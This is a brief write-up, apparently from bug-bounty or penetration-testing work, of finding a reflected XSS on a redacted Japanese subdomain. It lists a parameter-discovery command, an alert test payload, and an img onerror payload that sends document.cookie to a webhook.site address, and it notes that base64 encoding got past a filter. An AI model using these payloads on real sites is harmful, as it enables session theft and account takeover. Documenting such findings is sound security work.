Use Param Spider to gather all possible parameters:
param spider -d jp.redacted.com -s (to list in the terminal all possible parameters
Above found a parameter s=
, which allowed to execute Reflected XSS with a simple payload:
https://jp.redacted.com/?=<script>alert(1)</script>
Attempting to steal cookie failed:
<img src=onerror='document.location=%27https://webhook.site/790fbd5e-8cc4-441e-9a81-6ac18f40cb5f?c=%27+document.cookie;"'>
However, base64
encoding the payload worked.